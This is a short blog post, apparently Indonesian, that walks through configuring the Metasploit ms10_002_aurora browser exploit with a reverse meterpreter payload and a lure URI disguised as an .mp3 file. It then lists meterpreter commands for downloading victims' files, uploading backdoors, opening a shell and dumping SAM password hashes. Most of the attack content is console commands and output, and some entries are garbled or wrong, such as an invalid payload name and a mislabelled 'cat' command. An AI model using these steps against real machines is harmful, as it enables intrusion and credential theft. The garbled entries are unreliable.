Jumat, 28 Agustus 2015

BASIC COMMANDS METER PRETER





┌─[✗]─[root@parrot]─[/home/budhya]
└──╼ #msfconsole






 msf  >show option
 msf > use exploit/windows/browser/ms10_002_aurora
msf exploit(ms10_002_aurora) > show options



 
Module options (exploit/windows/browser/ms10_002_aurora):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(ms10_002_aurora) > Interrupt: use the 'exit' command to quit



==>>The next after that typing back

 msf exploit(ms10_002_aurora) > set SRVHOST 192.168.56.1
SRVHOST => 192.168.56.1
msf exploit(ms10_002_aurora) > show options



==>>The next after that typing back

msf exploit(ms10_002_aurora) > set URIPATH (nama file yg akan di krin).mp3
URIPATH => contoh  smangewe.mp3
see the pictures in the block



==>>then further re-typing the command

 msf exploit(ms10_002_aurora) > set PAYLOAD windows/meterpreter/reverse_rcp_dns
[-] The value specified for PAYLOAD is not valid.
msf exploit(ms10_002_aurora) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf exploit(ms10_002_aurora) > LPORT 53
[-] Unknown command: LPORT.
msf exploit(ms10_002_aurora) > set LPORT 53
LPORT => 53
msf exploit(ms10_002_aurora) > show options

Module options (exploit/windows/browser/ms10_002_aurora):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  192.168.56.1     yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH  smangewe.mp3     no        The URI to use for this exploit (default is random)


Exploit target:

   Id  Name
   --  ----
   0   Automatic

1. The help command 'help' will display the help menu on the terminal.
2. The background command 'background' returns us to the prompt msf / prompt before the exploit is executed.
3. ps command 'ps' is used to display the currently running processes.
4. migrate command 'migrate' is used to switch on the other.
5. ls 'ls' is used to display a list of files from a folder where we are.
6. download command 'download' is to download files from the victim's computer, and use the double-slashes (\\) to specify the directory.
7. upload command 'upload' is to upload a file into the victim's computer (usually backdoor), and use the double-slashes.
8. ipconfig command 'ipconfig' to display the network card / network interfaces and addresses of victims.
9. getuid command 'getuid' is to show the hostname of the victim's computer.
10. execute command 'execute' is to run the application the victim's computer.
11. shell command 'shell' is the command to get the shell of the victim's computer (usually command prompt windows).
12. idletime command 'idletime' is the command to determine the length of time of computer usage.
13. hasdump command 'hashdump' to display data from the SAM file.
14.? Command '? 'Is to get help from meterpreter.
15. The command channel 'channel' to display the currently active channel.
16. The close command is 'close' to get out of the channel.
17. exit command 'exit' to exit from the current session.
18. Interact command 'Interact' for interaction with the channel.
19. irb command 'irb' to run a ruby ​​shell command.
20. quit command 'quit' back to the terminal meterpreter and out of the active session.
21. read command 'read' to read the data from the channel.
22. Run command is 'run' to be able to run the script meterpreter.
23. write command 'write' is used to write into the channel.
24. paint command 'cat' is used to read a file.

Tidak ada komentar:

Posting Komentar